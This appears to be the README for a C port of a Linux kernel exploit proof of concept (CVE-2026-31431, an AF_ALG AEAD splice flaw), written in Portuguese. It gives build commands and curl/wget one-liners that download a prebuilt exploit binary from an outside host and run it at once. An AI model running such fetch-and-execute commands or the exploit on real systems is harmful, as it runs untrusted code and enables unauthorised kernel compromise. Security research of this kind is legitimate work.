
Port em C de uma prova de conceito que explora uma falha na lógica de splice do AF_ALG AEAD do kernel Linux (CVE-2026-31431) para pesquisa educacional.
Este projeto é um port em C do protótipo original em Python, por offsecguy.
Ele aproveita a API de criptografia do kernel Linux (AF_ALG) usando:
authencesn(hmac(sha256),cbc(aes))MSG_MOREsplice()A técnica alimenta dados de um descritor de arquivo somente leitura através de um socket criptográfico, processando-os bloco por bloco.
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALGzlib para descompressãoEste código é fornecido apenas para fins educacionais e de pesquisa.
Use com responsabilidade e somente em sistemas que você está autorizado a testar.